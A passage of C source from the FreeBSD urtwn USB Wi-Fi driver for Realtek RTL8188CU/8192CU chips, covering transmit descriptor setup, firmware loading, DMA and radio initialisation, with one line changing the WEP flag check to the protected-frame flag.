((sc->avg_pwdb * 19 + pwdb) / 20); DPRINTFN(4, "PWDB=%d EMA=%d\n", pwdb, sc->avg_pwdb); } static int8_t urtwn_get_rssi(struct urtwn_softc *sc, int rate, void *physt) { static const int8_t cckoff[] = { 16, -12, -26, -46 }; struct r92c_rx_phystat *phy; struct r92c_rx_cck *cck; uint8_t rpt; int8_t rssi; if (rate <= 3) { cck = (struct r92c_rx_cck *)physt; if (sc->sc_flags & URTWN_FLAG_CCK_HIPWR) { rpt = (cck->agc_rpt >> 5) & 0x3; rssi = (cck->agc_rpt & 0x1f) << 1; } else { rpt = (cck->agc_rpt >> 6) & 0x3; rssi = cck->agc_rpt & 0x3e; } rssi = cckoff[rpt] - rssi; } else { /* OFDM/HT. */ phy = (struct r92c_rx_phystat *)physt; rssi = ((le32toh(phy->phydw1) >> 1) & 0x7f) - 110; } return (rssi); } static int urtwn_tx_start(struct urtwn_softc *sc, struct ieee80211_node *ni, struct mbuf *m0, struct urtwn_data *data) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211_frame *wh; struct ieee80211_key *k; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = ni->ni_vap; struct usb_xfer *xfer; struct r92c_tx_desc *txd; uint8_t raid, type; uint16_t sum; int i, hasqos, xferlen; struct usb_xfer *urtwn_pipes[4] = { sc->sc_xfer[URTWN_BULK_TX_BE], sc->sc_xfer[URTWN_BULK_TX_BK], sc->sc_xfer[URTWN_BULK_TX_VI], sc->sc_xfer[URTWN_BULK_TX_VO] }; URTWN_ASSERT_LOCKED(sc); /* * Software crypto. */ wh = mtod(m0, struct ieee80211_frame *); - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { k = ieee80211_crypto_encap(ni, m0); if (k == NULL) { device_printf(sc->sc_dev, "ieee80211_crypto_encap returns NULL.\n"); /* XXX we don't expect the fragmented frames */ m_freem(m0); return (ENOBUFS); } /* in case packet header moved, reset pointer */ wh = mtod(m0, struct ieee80211_frame *); } switch (wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK) { case IEEE80211_FC0_TYPE_CTL: case IEEE80211_FC0_TYPE_MGT: xfer = sc->sc_xfer[URTWN_BULK_TX_VO]; break; default: KASSERT(M_WME_GETAC(m0) < 4, ("unsupported WME pipe %d", M_WME_GETAC(m0))); xfer = urtwn_pipes[M_WME_GETAC(m0)]; break; } hasqos = 0; /* Fill Tx descriptor. 
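 * Rate selection here is static: unicast data frames are queued at
 * hardware rate index 11 (OFDM 54 Mb/s) with RTS at index 8 (OFDM
 * 24 Mb/s), leaving the real rate adaptation to the firmware masks set
 * up in urtwn_ra_init(); management and multicast frames are forced to
 * CCK1 via R92C_TXDW4_DRVRATE.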
*/ txd = (struct r92c_tx_desc *)data->buf; memset(txd, 0, sizeof(*txd)); txd->txdw0 |= htole32( SM(R92C_TXDW0_PKTLEN, m0->m_pkthdr.len) | SM(R92C_TXDW0_OFFSET, sizeof(*txd)) | R92C_TXDW0_OWN | R92C_TXDW0_FSG | R92C_TXDW0_LSG); if (IEEE80211_IS_MULTICAST(wh->i_addr1)) txd->txdw0 |= htole32(R92C_TXDW0_BMCAST); type = wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK; if (!IEEE80211_IS_MULTICAST(wh->i_addr1) && type == IEEE80211_FC0_TYPE_DATA) { if (ic->ic_curmode == IEEE80211_MODE_11B) raid = R92C_RAID_11B; else raid = R92C_RAID_11BG; txd->txdw1 |= htole32( SM(R92C_TXDW1_MACID, URTWN_MACID_BSS) | SM(R92C_TXDW1_QSEL, R92C_TXDW1_QSEL_BE) | SM(R92C_TXDW1_RAID, raid) | R92C_TXDW1_AGGBK); if (ic->ic_flags & IEEE80211_F_USEPROT) { if (ic->ic_protmode == IEEE80211_PROT_CTSONLY) { txd->txdw4 |= htole32(R92C_TXDW4_CTS2SELF | R92C_TXDW4_HWRTSEN); } else if (ic->ic_protmode == IEEE80211_PROT_RTSCTS) { txd->txdw4 |= htole32(R92C_TXDW4_RTSEN | R92C_TXDW4_HWRTSEN); } } /* Send RTS at OFDM24. */ txd->txdw4 |= htole32(SM(R92C_TXDW4_RTSRATE, 8)); txd->txdw5 |= htole32(0x0001ff00); /* Send data at OFDM54. */ txd->txdw5 |= htole32(SM(R92C_TXDW5_DATARATE, 11)); } else { txd->txdw1 |= htole32( SM(R92C_TXDW1_MACID, 0) | SM(R92C_TXDW1_QSEL, R92C_TXDW1_QSEL_MGNT) | SM(R92C_TXDW1_RAID, R92C_RAID_11B)); /* Force CCK1. */ txd->txdw4 |= htole32(R92C_TXDW4_DRVRATE); txd->txdw5 |= htole32(SM(R92C_TXDW5_DATARATE, 0)); } /* Set sequence number (already little endian). */ txd->txdseq |= *(uint16_t *)wh->i_seq; if (!hasqos) { /* Use HW sequence numbering for non-QoS frames. */ txd->txdw4 |= htole32(R92C_TXDW4_HWSEQ); txd->txdseq |= htole16(0x8000); } else txd->txdw4 |= htole32(R92C_TXDW4_QOS); /* Compute Tx descriptor checksum. */ sum = 0; for (i = 0; i < sizeof(*txd) / 2; i++) sum ^= ((uint16_t *)txd)[i]; txd->txdsum = sum; /* NB: already little endian. 
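 * The checksum is simply the XOR of the descriptor's 16-bit words,
 * computed in the loop above; since XOR operates bytewise, the result
 * is already in the descriptor's little-endian layout and needs no
 * conversion.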
*/ if (ieee80211_radiotap_active_vap(vap)) { struct urtwn_tx_radiotap_header *tap = &sc->sc_txtap; tap->wt_flags = 0; tap->wt_chan_freq = htole16(ic->ic_curchan->ic_freq); tap->wt_chan_flags = htole16(ic->ic_curchan->ic_flags); ieee80211_radiotap_tx(vap, m0); } xferlen = sizeof(*txd) + m0->m_pkthdr.len; m_copydata(m0, 0, m0->m_pkthdr.len, (caddr_t)&txd[1]); data->buflen = xferlen; data->ni = ni; data->m = m0; STAILQ_INSERT_TAIL(&sc->sc_tx_pending, data, next); usbd_transfer_start(xfer); return (0); } static void urtwn_start(struct ifnet *ifp) { struct urtwn_softc *sc = ifp->if_softc; struct ieee80211_node *ni; struct mbuf *m; struct urtwn_data *bf; if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) return; URTWN_LOCK(sc); for (;;) { IFQ_DRV_DEQUEUE(&ifp->if_snd, m); if (m == NULL) break; bf = urtwn_getbuf(sc); if (bf == NULL) { IFQ_DRV_PREPEND(&ifp->if_snd, m); break; } ni = (struct ieee80211_node *)m->m_pkthdr.rcvif; m->m_pkthdr.rcvif = NULL; if (urtwn_tx_start(sc, ni, m, bf) != 0) { ifp->if_oerrors++; STAILQ_INSERT_HEAD(&sc->sc_tx_inactive, bf, next); ieee80211_free_node(ni); break; } sc->sc_txtimer = 5; callout_reset(&sc->sc_watchdog_ch, hz, urtwn_watchdog, sc); } URTWN_UNLOCK(sc); } static int urtwn_ioctl(struct ifnet *ifp, u_long cmd, caddr_t data) { struct ieee80211com *ic = ifp->if_l2com; struct ifreq *ifr = (struct ifreq *) data; int error = 0, startall = 0; switch (cmd) { case SIOCSIFFLAGS: if (ifp->if_flags & IFF_UP) { if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) { urtwn_init(ifp->if_softc); startall = 1; } } else { if (ifp->if_drv_flags & IFF_DRV_RUNNING) urtwn_stop(ifp, 1); } if (startall) ieee80211_start_all(ic); break; case SIOCGIFMEDIA: error = ifmedia_ioctl(ifp, ifr, &ic->ic_media, cmd); break; case SIOCGIFADDR: error = ether_ioctl(ifp, cmd, data); break; default: error = EINVAL; break; } return (error); } static int urtwn_alloc_list(struct urtwn_softc *sc, struct urtwn_data data[], int ndata, int maxsz) { int i, error; for (i = 0; i < ndata; i++) { struct urtwn_data *dp = &data[i]; dp->sc = sc; dp->m = NULL; dp->buf = malloc(maxsz, M_USBDEV, M_NOWAIT); if (dp->buf == NULL) { device_printf(sc->sc_dev, "could not allocate buffer\n"); error = ENOMEM; goto fail; } dp->ni = NULL; } return (0); fail: urtwn_free_list(sc, data, ndata); return (error); } static int urtwn_alloc_rx_list(struct urtwn_softc *sc) { int error, i; error = urtwn_alloc_list(sc, sc->sc_rx, URTWN_RX_LIST_COUNT, URTWN_RXBUFSZ); if (error != 0) return (error); STAILQ_INIT(&sc->sc_rx_active); STAILQ_INIT(&sc->sc_rx_inactive); for (i = 0; i < URTWN_RX_LIST_COUNT; i++) STAILQ_INSERT_HEAD(&sc->sc_rx_inactive, &sc->sc_rx[i], next); return (0); } static int urtwn_alloc_tx_list(struct urtwn_softc *sc) { int error, i; error = urtwn_alloc_list(sc, sc->sc_tx, URTWN_TX_LIST_COUNT, URTWN_TXBUFSZ); if (error != 0) return (error); STAILQ_INIT(&sc->sc_tx_active); STAILQ_INIT(&sc->sc_tx_inactive); STAILQ_INIT(&sc->sc_tx_pending); for (i = 0; i < URTWN_TX_LIST_COUNT; i++) STAILQ_INSERT_HEAD(&sc->sc_tx_inactive, &sc->sc_tx[i], next); return (0); } static int urtwn_power_on(struct urtwn_softc *sc) { uint32_t reg; int ntries; /* Wait for autoload done bit. */ for (ntries = 0; ntries < 1000; ntries++) { if (urtwn_read_1(sc, R92C_APS_FSMCO) & R92C_APS_FSMCO_PFM_ALDN) break; DELAY(5); } if (ntries == 1000) { device_printf(sc->sc_dev, "timeout waiting for chip autoload\n"); return (ETIMEDOUT); } /* Unlock ISO/CLK/Power control register. */ urtwn_write_1(sc, R92C_RSV_CTRL, 0); /* Move SPS into PWM mode. 
*/ urtwn_write_1(sc, R92C_SPS0_CTRL, 0x2b); DELAY(100); reg = urtwn_read_1(sc, R92C_LDOV12D_CTRL); if (!(reg & R92C_LDOV12D_CTRL_LDV12_EN)) { urtwn_write_1(sc, R92C_LDOV12D_CTRL, reg | R92C_LDOV12D_CTRL_LDV12_EN); DELAY(100); urtwn_write_1(sc, R92C_SYS_ISO_CTRL, urtwn_read_1(sc, R92C_SYS_ISO_CTRL) & ~R92C_SYS_ISO_CTRL_MD2PP); } /* Auto enable WLAN. */ urtwn_write_2(sc, R92C_APS_FSMCO, urtwn_read_2(sc, R92C_APS_FSMCO) | R92C_APS_FSMCO_APFM_ONMAC); for (ntries = 0; ntries < 1000; ntries++) { if (urtwn_read_2(sc, R92C_APS_FSMCO) & R92C_APS_FSMCO_APFM_ONMAC) break; DELAY(5); } if (ntries == 1000) { device_printf(sc->sc_dev, "timeout waiting for MAC auto ON\n"); return (ETIMEDOUT); } /* Enable radio, GPIO and LED functions. */ urtwn_write_2(sc, R92C_APS_FSMCO, R92C_APS_FSMCO_AFSM_HSUS | R92C_APS_FSMCO_PDN_EN | R92C_APS_FSMCO_PFM_ALDN); /* Release RF digital isolation. */ urtwn_write_2(sc, R92C_SYS_ISO_CTRL, urtwn_read_2(sc, R92C_SYS_ISO_CTRL) & ~R92C_SYS_ISO_CTRL_DIOR); /* Initialize MAC. */ urtwn_write_1(sc, R92C_APSD_CTRL, urtwn_read_1(sc, R92C_APSD_CTRL) & ~R92C_APSD_CTRL_OFF); for (ntries = 0; ntries < 200; ntries++) { if (!(urtwn_read_1(sc, R92C_APSD_CTRL) & R92C_APSD_CTRL_OFF_STATUS)) break; DELAY(5); } if (ntries == 200) { device_printf(sc->sc_dev, "timeout waiting for MAC initialization\n"); return (ETIMEDOUT); } /* Enable MAC DMA/WMAC/SCHEDULE/SEC blocks. */ reg = urtwn_read_2(sc, R92C_CR); reg |= R92C_CR_HCI_TXDMA_EN | R92C_CR_HCI_RXDMA_EN | R92C_CR_TXDMA_EN | R92C_CR_RXDMA_EN | R92C_CR_PROTOCOL_EN | R92C_CR_SCHEDULE_EN | R92C_CR_MACTXEN | R92C_CR_MACRXEN | R92C_CR_ENSEC; urtwn_write_2(sc, R92C_CR, reg); urtwn_write_1(sc, 0xfe10, 0x19); return (0); } static int urtwn_llt_init(struct urtwn_softc *sc) { int i, error; /* Reserve pages [0; R92C_TX_PAGE_COUNT]. */ for (i = 0; i < R92C_TX_PAGE_COUNT; i++) { if ((error = urtwn_llt_write(sc, i, i + 1)) != 0) return (error); } /* NB: 0xff indicates end-of-list. */ if ((error = urtwn_llt_write(sc, i, 0xff)) != 0) return (error); /* * Use pages [R92C_TX_PAGE_COUNT + 1; R92C_TXPKTBUF_COUNT - 1] * as ring buffer. */ for (++i; i < R92C_TXPKTBUF_COUNT - 1; i++) { if ((error = urtwn_llt_write(sc, i, i + 1)) != 0) return (error); } /* Make the last page point to the beginning of the ring buffer. */ error = urtwn_llt_write(sc, i, R92C_TX_PAGE_COUNT + 1); return (error); } static void urtwn_fw_reset(struct urtwn_softc *sc) { uint16_t reg; int ntries; /* Tell 8051 to reset itself. */ urtwn_write_1(sc, R92C_HMETFR + 3, 0x20); /* Wait until 8051 resets by itself. */ for (ntries = 0; ntries < 100; ntries++) { reg = urtwn_read_2(sc, R92C_SYS_FUNC_EN); if (!(reg & R92C_SYS_FUNC_EN_CPUEN)) return; DELAY(50); } /* Force 8051 reset. 
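 * Reached only if the 8051 has not cleared CPUEN on its own within
 * roughly 5 ms (100 polls with DELAY(50) in between); clearing
 * R92C_SYS_FUNC_EN_CPUEN below resets it from the host side.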
*/ urtwn_write_2(sc, R92C_SYS_FUNC_EN, reg & ~R92C_SYS_FUNC_EN_CPUEN); } static int urtwn_fw_loadpage(struct urtwn_softc *sc, int page, const uint8_t *buf, int len) { uint32_t reg; int off, mlen, error = 0; reg = urtwn_read_4(sc, R92C_MCUFWDL); reg = RW(reg, R92C_MCUFWDL_PAGE, page); urtwn_write_4(sc, R92C_MCUFWDL, reg); off = R92C_FW_START_ADDR; while (len > 0) { if (len > 196) mlen = 196; else if (len > 4) mlen = 4; else mlen = 1; /* XXX fix this deconst */ error = urtwn_write_region_1(sc, off, __DECONST(uint8_t *, buf), mlen); if (error != 0) break; off += mlen; buf += mlen; len -= mlen; } return (error); } static int urtwn_load_firmware(struct urtwn_softc *sc) { const struct firmware *fw; const struct r92c_fw_hdr *hdr; const char *imagename; const u_char *ptr; size_t len; uint32_t reg; int mlen, ntries, page, error; /* Read firmware image from the filesystem. */ if ((sc->chip & (URTWN_CHIP_UMC_A_CUT | URTWN_CHIP_92C)) == URTWN_CHIP_UMC_A_CUT) imagename = "urtwn-rtl8192cfwU"; else imagename = "urtwn-rtl8192cfwT"; fw = firmware_get(imagename); if (fw == NULL) { device_printf(sc->sc_dev, "failed loadfirmware of file %s\n", imagename); return (ENOENT); } len = fw->datasize; if (len < sizeof(*hdr)) { device_printf(sc->sc_dev, "firmware too short\n"); error = EINVAL; goto fail; } ptr = fw->data; hdr = (const struct r92c_fw_hdr *)ptr; /* Check if there is a valid FW header and skip it. */ if ((le16toh(hdr->signature) >> 4) == 0x88c || (le16toh(hdr->signature) >> 4) == 0x92c) { DPRINTF("FW V%d.%d %02d-%02d %02d:%02d\n", le16toh(hdr->version), le16toh(hdr->subversion), hdr->month, hdr->date, hdr->hour, hdr->minute); ptr += sizeof(*hdr); len -= sizeof(*hdr); } if (urtwn_read_1(sc, R92C_MCUFWDL) & 0x80) { urtwn_fw_reset(sc); urtwn_write_1(sc, R92C_MCUFWDL, 0); } urtwn_write_2(sc, R92C_SYS_FUNC_EN, urtwn_read_2(sc, R92C_SYS_FUNC_EN) | R92C_SYS_FUNC_EN_CPUEN); urtwn_write_1(sc, R92C_MCUFWDL, urtwn_read_1(sc, R92C_MCUFWDL) | R92C_MCUFWDL_EN); urtwn_write_1(sc, R92C_MCUFWDL + 2, urtwn_read_1(sc, R92C_MCUFWDL + 2) & ~0x08); for (page = 0; len > 0; page++) { mlen = min(len, R92C_FW_PAGE_SIZE); error = urtwn_fw_loadpage(sc, page, ptr, mlen); if (error != 0) { device_printf(sc->sc_dev, "could not load firmware page\n"); goto fail; } ptr += mlen; len -= mlen; } urtwn_write_1(sc, R92C_MCUFWDL, urtwn_read_1(sc, R92C_MCUFWDL) & ~R92C_MCUFWDL_EN); urtwn_write_1(sc, R92C_MCUFWDL + 1, 0); /* Wait for checksum report. */ for (ntries = 0; ntries < 1000; ntries++) { if (urtwn_read_4(sc, R92C_MCUFWDL) & R92C_MCUFWDL_CHKSUM_RPT) break; DELAY(5); } if (ntries == 1000) { device_printf(sc->sc_dev, "timeout waiting for checksum report\n"); error = ETIMEDOUT; goto fail; } reg = urtwn_read_4(sc, R92C_MCUFWDL); reg = (reg & ~R92C_MCUFWDL_WINTINI_RDY) | R92C_MCUFWDL_RDY; urtwn_write_4(sc, R92C_MCUFWDL, reg); /* Wait for firmware readiness. */ for (ntries = 0; ntries < 1000; ntries++) { if (urtwn_read_4(sc, R92C_MCUFWDL) & R92C_MCUFWDL_WINTINI_RDY) break; DELAY(5); } if (ntries == 1000) { device_printf(sc->sc_dev, "timeout waiting for firmware readiness\n"); error = ETIMEDOUT; goto fail; } fail: firmware_put(fw, FIRMWARE_UNLOAD); return (error); } static int urtwn_dma_init(struct urtwn_softc *sc) { int hashq, hasnq, haslq, nqueues, nqpages, nrempages; uint32_t reg; int error; /* Initialize LLT table. */ error = urtwn_llt_init(sc); if (error != 0) return (error); /* Get Tx queues to USB endpoints mapping. 
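 * The non-public Tx buffer pages are then split evenly among the
 * high/normal/low priority queues that are actually backed by a USB
 * endpoint, with any remainder from the division credited to the high
 * priority queue.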
*/ hashq = hasnq = haslq = 0; reg = urtwn_read_2(sc, R92C_USB_EP + 1); DPRINTFN(2, "USB endpoints mapping 0x%x\n", reg); if (MS(reg, R92C_USB_EP_HQ) != 0) hashq = 1; if (MS(reg, R92C_USB_EP_NQ) != 0) hasnq = 1; if (MS(reg, R92C_USB_EP_LQ) != 0) haslq = 1; nqueues = hashq + hasnq + haslq; if (nqueues == 0) return (EIO); /* Get the number of pages for each queue. */ nqpages = (R92C_TX_PAGE_COUNT - R92C_PUBQ_NPAGES) / nqueues; /* The remaining pages are assigned to the high priority queue. */ nrempages = (R92C_TX_PAGE_COUNT - R92C_PUBQ_NPAGES) % nqueues; /* Set number of pages for normal priority queue. */ urtwn_write_1(sc, R92C_RQPN_NPQ, hasnq ? nqpages : 0); urtwn_write_4(sc, R92C_RQPN, /* Set number of pages for public queue. */ SM(R92C_RQPN_PUBQ, R92C_PUBQ_NPAGES) | /* Set number of pages for high priority queue. */ SM(R92C_RQPN_HPQ, hashq ? nqpages + nrempages : 0) | /* Set number of pages for low priority queue. */ SM(R92C_RQPN_LPQ, haslq ? nqpages : 0) | /* Load values. */ R92C_RQPN_LD); urtwn_write_1(sc, R92C_TXPKTBUF_BCNQ_BDNY, R92C_TX_PAGE_BOUNDARY); urtwn_write_1(sc, R92C_TXPKTBUF_MGQ_BDNY, R92C_TX_PAGE_BOUNDARY); urtwn_write_1(sc, R92C_TXPKTBUF_WMAC_LBK_BF_HD, R92C_TX_PAGE_BOUNDARY); urtwn_write_1(sc, R92C_TRXFF_BNDY, R92C_TX_PAGE_BOUNDARY); urtwn_write_1(sc, R92C_TDECTRL + 1, R92C_TX_PAGE_BOUNDARY); /* Set queue to USB pipe mapping. */ reg = urtwn_read_2(sc, R92C_TRXDMA_CTRL); reg &= ~R92C_TRXDMA_CTRL_QMAP_M; if (nqueues == 1) { if (hashq) reg |= R92C_TRXDMA_CTRL_QMAP_HQ; else if (hasnq) reg |= R92C_TRXDMA_CTRL_QMAP_NQ; else reg |= R92C_TRXDMA_CTRL_QMAP_LQ; } else if (nqueues == 2) { /* All 2-endpoints configs have a high priority queue. */ if (!hashq) return (EIO); if (hasnq) reg |= R92C_TRXDMA_CTRL_QMAP_HQ_NQ; else reg |= R92C_TRXDMA_CTRL_QMAP_HQ_LQ; } else reg |= R92C_TRXDMA_CTRL_QMAP_3EP; urtwn_write_2(sc, R92C_TRXDMA_CTRL, reg); /* Set Tx/Rx transfer page boundary. */ urtwn_write_2(sc, R92C_TRXFF_BNDY + 2, 0x27ff); /* Set Tx/Rx transfer page size. */ urtwn_write_1(sc, R92C_PBP, SM(R92C_PBP_PSRX, R92C_PBP_128) | SM(R92C_PBP_PSTX, R92C_PBP_128)); return (0); } static void urtwn_mac_init(struct urtwn_softc *sc) { int i; /* Write MAC initialization values. */ for (i = 0; i < nitems(rtl8192cu_mac); i++) urtwn_write_1(sc, rtl8192cu_mac[i].reg, rtl8192cu_mac[i].val); } static void urtwn_bb_init(struct urtwn_softc *sc) { const struct urtwn_bb_prog *prog; uint32_t reg; int i; /* Enable BB and RF. */ urtwn_write_2(sc, R92C_SYS_FUNC_EN, urtwn_read_2(sc, R92C_SYS_FUNC_EN) | R92C_SYS_FUNC_EN_BBRSTB | R92C_SYS_FUNC_EN_BB_GLB_RST | R92C_SYS_FUNC_EN_DIO_RF); urtwn_write_2(sc, R92C_AFE_PLL_CTRL, 0xdb83); urtwn_write_1(sc, R92C_RF_CTRL, R92C_RF_CTRL_EN | R92C_RF_CTRL_RSTB | R92C_RF_CTRL_SDMRSTB); urtwn_write_1(sc, R92C_SYS_FUNC_EN, R92C_SYS_FUNC_EN_USBA | R92C_SYS_FUNC_EN_USBD | R92C_SYS_FUNC_EN_BB_GLB_RST | R92C_SYS_FUNC_EN_BBRSTB); urtwn_write_1(sc, R92C_LDOHCI12_CTRL, 0x0f); urtwn_write_1(sc, 0x15, 0xe9); urtwn_write_1(sc, R92C_AFE_XTAL_CTRL + 1, 0x80); /* Select BB programming based on board type. */ if (!(sc->chip & URTWN_CHIP_92C)) { if (sc->board_type == R92C_BOARD_TYPE_MINICARD) prog = &rtl8188ce_bb_prog; else if (sc->board_type == R92C_BOARD_TYPE_HIGHPA) prog = &rtl8188ru_bb_prog; else prog = &rtl8188cu_bb_prog; } else { if (sc->board_type == R92C_BOARD_TYPE_MINICARD) prog = &rtl8192ce_bb_prog; else prog = &rtl8192cu_bb_prog; } /* Write BB initialization values. 
*/ for (i = 0; i < prog->count; i++) { urtwn_bb_write(sc, prog->regs[i], prog->vals[i]); DELAY(1); } if (sc->chip & URTWN_CHIP_92C_1T2R) { /* 8192C 1T only configuration. */ reg = urtwn_bb_read(sc, R92C_FPGA0_TXINFO); reg = (reg & ~0x00000003) | 0x2; urtwn_bb_write(sc, R92C_FPGA0_TXINFO, reg); reg = urtwn_bb_read(sc, R92C_FPGA1_TXINFO); reg = (reg & ~0x00300033) | 0x00200022; urtwn_bb_write(sc, R92C_FPGA1_TXINFO, reg); reg = urtwn_bb_read(sc, R92C_CCK0_AFESETTING); reg = (reg & ~0xff000000) | 0x45 << 24; urtwn_bb_write(sc, R92C_CCK0_AFESETTING, reg); reg = urtwn_bb_read(sc, R92C_OFDM0_TRXPATHENA); reg = (reg & ~0x000000ff) | 0x23; urtwn_bb_write(sc, R92C_OFDM0_TRXPATHENA, reg); reg = urtwn_bb_read(sc, R92C_OFDM0_AGCPARAM1); reg = (reg & ~0x00000030) | 1 << 4; urtwn_bb_write(sc, R92C_OFDM0_AGCPARAM1, reg); reg = urtwn_bb_read(sc, 0xe74); reg = (reg & ~0x0c000000) | 2 << 26; urtwn_bb_write(sc, 0xe74, reg); reg = urtwn_bb_read(sc, 0xe78); reg = (reg & ~0x0c000000) | 2 << 26; urtwn_bb_write(sc, 0xe78, reg); reg = urtwn_bb_read(sc, 0xe7c); reg = (reg & ~0x0c000000) | 2 << 26; urtwn_bb_write(sc, 0xe7c, reg); reg = urtwn_bb_read(sc, 0xe80); reg = (reg & ~0x0c000000) | 2 << 26; urtwn_bb_write(sc, 0xe80, reg); reg = urtwn_bb_read(sc, 0xe88); reg = (reg & ~0x0c000000) | 2 << 26; urtwn_bb_write(sc, 0xe88, reg); } /* Write AGC values. */ for (i = 0; i < prog->agccount; i++) { urtwn_bb_write(sc, R92C_OFDM0_AGCRSSITABLE, prog->agcvals[i]); DELAY(1); } if (urtwn_bb_read(sc, R92C_HSSI_PARAM2(0)) & R92C_HSSI_PARAM2_CCK_HIPWR) sc->sc_flags |= URTWN_FLAG_CCK_HIPWR; } void urtwn_rf_init(struct urtwn_softc *sc) { const struct urtwn_rf_prog *prog; uint32_t reg, type; int i, j, idx, off; /* Select RF programming based on board type. */ if (!(sc->chip & URTWN_CHIP_92C)) { if (sc->board_type == R92C_BOARD_TYPE_MINICARD) prog = rtl8188ce_rf_prog; else if (sc->board_type == R92C_BOARD_TYPE_HIGHPA) prog = rtl8188ru_rf_prog; else prog = rtl8188cu_rf_prog; } else prog = rtl8192ce_rf_prog; for (i = 0; i < sc->nrxchains; i++) { /* Save RF_ENV control type. */ idx = i / 2; off = (i % 2) * 16; reg = urtwn_bb_read(sc, R92C_FPGA0_RFIFACESW(idx)); type = (reg >> off) & 0x10; /* Set RF_ENV enable. */ reg = urtwn_bb_read(sc, R92C_FPGA0_RFIFACEOE(i)); reg |= 0x100000; urtwn_bb_write(sc, R92C_FPGA0_RFIFACEOE(i), reg); DELAY(1); /* Set RF_ENV output high. */ reg = urtwn_bb_read(sc, R92C_FPGA0_RFIFACEOE(i)); reg |= 0x10; urtwn_bb_write(sc, R92C_FPGA0_RFIFACEOE(i), reg); DELAY(1); /* Set address and data lengths of RF registers. */ reg = urtwn_bb_read(sc, R92C_HSSI_PARAM2(i)); reg &= ~R92C_HSSI_PARAM2_ADDR_LENGTH; urtwn_bb_write(sc, R92C_HSSI_PARAM2(i), reg); DELAY(1); reg = urtwn_bb_read(sc, R92C_HSSI_PARAM2(i)); reg &= ~R92C_HSSI_PARAM2_DATA_LENGTH; urtwn_bb_write(sc, R92C_HSSI_PARAM2(i), reg); DELAY(1); /* Write RF initialization values for this chain. */ for (j = 0; j < prog[i].count; j++) { if (prog[i].regs[j] >= 0xf9 && prog[i].regs[j] <= 0xfe) { /* * These are fake RF registers offsets that * indicate a delay is required. */ usb_pause_mtx(&sc->sc_mtx, 50); continue; } urtwn_rf_write(sc, i, prog[i].regs[j], prog[i].vals[j]); DELAY(1); } /* Restore RF_ENV control type. */ reg = urtwn_bb_read(sc, R92C_FPGA0_RFIFACESW(idx)); reg &= ~(0x10 << off) | (type << off); urtwn_bb_write(sc, R92C_FPGA0_RFIFACESW(idx), reg); /* Cache RF register CHNLBW. 
*/ sc->rf_chnlbw[i] = urtwn_rf_read(sc, i, R92C_RF_CHNLBW); } if ((sc->chip & (URTWN_CHIP_UMC_A_CUT | URTWN_CHIP_92C)) == URTWN_CHIP_UMC_A_CUT) { urtwn_rf_write(sc, 0, R92C_RF_RX_G1, 0x30255); urtwn_rf_write(sc, 0, R92C_RF_RX_G2, 0x50a00); } } static void urtwn_cam_init(struct urtwn_softc *sc) { /* Invalidate all CAM entries. */ urtwn_write_4(sc, R92C_CAMCMD, R92C_CAMCMD_POLLING | R92C_CAMCMD_CLR); } static void urtwn_pa_bias_init(struct urtwn_softc *sc) { uint8_t reg; int i; for (i = 0; i < sc->nrxchains; i++) { if (sc->pa_setting & (1 << i)) continue; urtwn_rf_write(sc, i, R92C_RF_IPA, 0x0f406); urtwn_rf_write(sc, i, R92C_RF_IPA, 0x4f406); urtwn_rf_write(sc, i, R92C_RF_IPA, 0x8f406); urtwn_rf_write(sc, i, R92C_RF_IPA, 0xcf406); } if (!(sc->pa_setting & 0x10)) { reg = urtwn_read_1(sc, 0x16); reg = (reg & ~0xf0) | 0x90; urtwn_write_1(sc, 0x16, reg); } } static void urtwn_rxfilter_init(struct urtwn_softc *sc) { /* Initialize Rx filter. */ /* TODO: use better filter for monitor mode. */ urtwn_write_4(sc, R92C_RCR, R92C_RCR_AAP | R92C_RCR_APM | R92C_RCR_AM | R92C_RCR_AB | R92C_RCR_APP_ICV | R92C_RCR_AMF | R92C_RCR_HTC_LOC_CTRL | R92C_RCR_APP_MIC | R92C_RCR_APP_PHYSTS); /* Accept all multicast frames. */ urtwn_write_4(sc, R92C_MAR + 0, 0xffffffff); urtwn_write_4(sc, R92C_MAR + 4, 0xffffffff); /* Accept all management frames. */ urtwn_write_2(sc, R92C_RXFLTMAP0, 0xffff); /* Reject all control frames. */ urtwn_write_2(sc, R92C_RXFLTMAP1, 0x0000); /* Accept all data frames. */ urtwn_write_2(sc, R92C_RXFLTMAP2, 0xffff); } static void urtwn_edca_init(struct urtwn_softc *sc) { urtwn_write_2(sc, R92C_SPEC_SIFS, 0x100a); urtwn_write_2(sc, R92C_MAC_SPEC_SIFS, 0x100a); urtwn_write_2(sc, R92C_SIFS_CCK, 0x100a); urtwn_write_2(sc, R92C_SIFS_OFDM, 0x100a); urtwn_write_4(sc, R92C_EDCA_BE_PARAM, 0x005ea42b); urtwn_write_4(sc, R92C_EDCA_BK_PARAM, 0x0000a44f); urtwn_write_4(sc, R92C_EDCA_VI_PARAM, 0x005ea324); urtwn_write_4(sc, R92C_EDCA_VO_PARAM, 0x002fa226); } void urtwn_write_txpower(struct urtwn_softc *sc, int chain, uint16_t power[URTWN_RIDX_COUNT]) { uint32_t reg; /* Write per-CCK rate Tx power. */ if (chain == 0) { reg = urtwn_bb_read(sc, R92C_TXAGC_A_CCK1_MCS32); reg = RW(reg, R92C_TXAGC_A_CCK1, power[0]); urtwn_bb_write(sc, R92C_TXAGC_A_CCK1_MCS32, reg); reg = urtwn_bb_read(sc, R92C_TXAGC_B_CCK11_A_CCK2_11); reg = RW(reg, R92C_TXAGC_A_CCK2, power[1]); reg = RW(reg, R92C_TXAGC_A_CCK55, power[2]); reg = RW(reg, R92C_TXAGC_A_CCK11, power[3]); urtwn_bb_write(sc, R92C_TXAGC_B_CCK11_A_CCK2_11, reg); } else { reg = urtwn_bb_read(sc, R92C_TXAGC_B_CCK1_55_MCS32); reg = RW(reg, R92C_TXAGC_B_CCK1, power[0]); reg = RW(reg, R92C_TXAGC_B_CCK2, power[1]); reg = RW(reg, R92C_TXAGC_B_CCK55, power[2]); urtwn_bb_write(sc, R92C_TXAGC_B_CCK1_55_MCS32, reg); reg = urtwn_bb_read(sc, R92C_TXAGC_B_CCK11_A_CCK2_11); reg = 